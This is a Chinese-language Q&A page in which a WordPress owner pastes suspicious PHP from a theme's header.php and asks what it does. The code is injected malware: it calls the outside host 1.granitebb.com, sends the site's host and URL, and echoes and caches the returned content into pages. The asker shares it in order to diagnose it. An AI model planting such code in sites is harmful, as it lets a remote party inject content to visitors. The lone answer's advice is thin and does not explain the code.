PHP恶意软件，WordPress的利用，PHP病毒

Question

当我使用exploit scanner插件我得到下面的结果扫描一个WordPress

图片1：

图2：

图3：

有什么可担心的吗？是包含恶意代码？

另外在theame header.php文件中，我看到了以下细节。有什么可担心的吗？以下代码实际上在做什么？

<?php 
$h = $_SERVER['HTTP_HOST']; $u = trim($_SERVER['REQUEST_URI']); 
$cd = dirname(__FILE__) . '/.cache'; 
$cf = $cd . '/' . md5($h . '##' . $u); 
$s = '1.granitebb.com'; 
if (file_exists($cf) and filemtime($cf) > time() - 3600) 
    echo file_get_contents($cf); 
else 
{ 
    $ini1 = @ini_set('allow_url_fopen', 1); $ini2 = @ini_set('default_socket_timeout', 3); 
    $p = '/links.php?u=' . urlencode($u) . '&h=' . urlencode($h); 
    $c = ''; 
    if ($fp = @fsockopen($s, 80, $errno, $errstr, 3)) { 
     @fputs($fp, "GET {$p} HTTP/1.0\r\nHost: $s\r\n\r\n"); 
     while (! feof($fp)) 
      $c .= @fread($fp, 8192); 
     fclose($fp); 
     $c = end(explode("\r\n\r\n", $c)); 
     echo $c; 
     if (strlen($c) and (is_dir($cd) or @mkdir($cd))) { 
      @file_put_contents($cf, $c); 
     } 
    } 
    @ini_set('allow_url_fopen', $ini1); @ini_set('default_socket_timeout', $ini2); 
} 
?> 

Answer 1

执行以下操作检查，以确保您的安全： 1：从原始来源处下载WordPress的插件文件。 2：将这些文件与您在wordpress安装中扫描的文件进行比较。

如果他们是相同的，你（可能）是安全的。如果它们不相同，请删除坏文件并重新安装插件。之后，找到有人检查文件为什么被改变。

建议：如果您不知道如何处理结果，请不要运行这些扫描仪。它只会给你一种不好的感觉，可能完全没有理由。